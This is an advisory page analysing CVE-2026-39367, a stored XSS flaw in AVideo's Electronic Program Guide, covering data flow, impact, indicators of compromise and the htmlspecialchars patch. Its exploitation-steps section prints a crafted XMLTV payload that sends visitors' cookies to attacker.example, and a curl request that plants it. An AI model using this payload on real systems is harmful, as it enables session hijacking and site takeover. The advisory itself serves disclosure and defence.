CVE-2026-39367: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-39367 is a stored Cross-Site Scripting (XSS) vulnerability in WWBN AVideo's Electronic Program Guide (EPG) feature that allows an authenticated user with upload permissions to inject malicious JavaScript into the public EPG page, affecting all unauthenticated visitors. It affects AVideo versions 26.0 and prior (composer package wwbn/avideo). The vulnerability was published on April 7, 2026, with a patch commit available shortly after. It carries a CVSS v3.1 base score of 5.4 (Medium) (Github Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and spans three files in the data flow. First, objects/videoAddNew.json.php (lines 117–119) stores the epg_link parameter with only a URL format check, requiring only basic upload permission (User::canUpload()). Second, objects/EpgParser.php (line 321) extracts programme titles from the XML as raw strings with no sanitization. Third, plugin/PlayerSkins/epg.php (lines 343–351) interpolates these titles directly into HTML output without htmlspecialchars() or any escaping — enabling both HTML injection and HTML attribute injection depending on the display width. Notably, channel display names are sanitized via safeString(), but programme titles are not, indicating an oversight. The rendered output is also cached server-side (ObjectYPT::setCache at line 634), meaning the XSS payload persists even if the malicious XML source is later removed (Github Advisory, AVideo Security Advisory).

Impact

Successful exploitation enables session hijacking of any visitor to the public EPG page, including administrators, as their session cookies are exfiltrated via the injected JavaScript. Stolen admin sessions grant full platform control, enabling account takeover and unauthorized content manipulation. The attack has a wide blast radius because the EPG page requires no authentication, the payload is server-side cached, and it fires for every subsequent visitor without further attacker interaction (Github Advisory).

Exploitability

No public proof-of-concept exploit code beyond the PoC included in the GitHub Security Advisory itself has been reported, and there is no evidence of in-the-wild exploitation at this time. The EPSS score is approximately 0.029–0.034%, placing it in the 10th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires only low-privilege upload access to the target AVideo instance, lowering the barrier for abuse (Github Advisory).

Exploitation steps

  1. Obtain upload permissions: Register or compromise an account on the target AVideo instance that has upload (User::canUpload()) permissions — administrator access is not required.
  2. Host a malicious XMLTV file: Set up an attacker-controlled web server hosting a crafted XMLTV XML file with a JavaScript payload in the <title> element using a CDATA section:
<?xml version="1.0" encoding="UTF-8"?>
<tv>
  <channel id="ch1"><display-name>Test Channel</display-name></channel>
  <programme start="20260404060000 +0000" stop="20260404070000 +0000" channel="ch1">
    <title><![CDATA[<img src=x onerror=fetch('https://attacker.example/steal?c='+document.cookie)>]]></title>
  </programme>
</tv>
  1. Link the malicious XML to a video: Using the upload session, POST to videoAddNew.json.php with the epg_link parameter pointing to the attacker-hosted XML:
curl -s -b 'PHPSESSID=UPLOAD_USER_SESSION' \
  'https://target.example/objects/videoAddNew.json.php' \
  -d 'title=LiveStream&videoLink=https://example.com/stream.m3u8&epg_link=https://attacker.example/evil.xml&categories_id=1'
  1. Payload caches on EPG page: When the EPG page is next rendered, EpgParser.php fetches and parses the malicious XML, and epg.php injects the unsanitized title into HTML. The result is cached server-side.
  2. Harvest credentials from victims: Any unauthenticated visitor browsing https://target.example/plugin/PlayerSkins/epg.php triggers the XSS, exfiltrating their session cookies to the attacker's server. Admin cookies enable full platform takeover (AVideo Security Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from the AVideo server to external attacker-controlled URLs during EPG XML parsing; visitor browsers making unexpected requests to external domains (e.g., attacker.example/steal?c=) originating from the EPG page.
  • Logs: Web server access logs showing POST requests to /objects/videoAddNew.json.php with an epg_link parameter pointing to an external or suspicious XML URL; server-side HTTP requests to external XML sources initiated by the EPG parser.
  • File System / Cache: Cached EPG page output (via ObjectYPT::setCache) containing raw <img>, <script>, or onerror HTML tags within programme title fields — inspect the EPG cache files for unsanitized HTML.
  • Application: Video records in the database where the epg_link field points to an external or unexpected URL hosting an XML file; EPG XML files containing CDATA sections with JavaScript or HTML event handlers in <title> elements (AVideo Security Advisory).

Mitigation and workarounds

The fix is implemented in commit e0212add4aad0f1e97758a4b4fdc57df58ce68e8, which applies htmlspecialchars($program['title'], ENT_QUOTES, 'UTF-8') to programme titles before HTML interpolation in plugin/PlayerSkins/epg.php. Administrators should upgrade AVideo to a version incorporating this patch (beyond 26.0). As interim mitigations: restrict upload permissions to trusted users only, audit existing epg_link values in the database for suspicious external XML URLs, and clear the server-side EPG cache to remove any persisted XSS payloads. Additionally, consider adding input sanitization at parse time in EpgParser.php for defense in depth (Github Advisory, Patch Commit).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management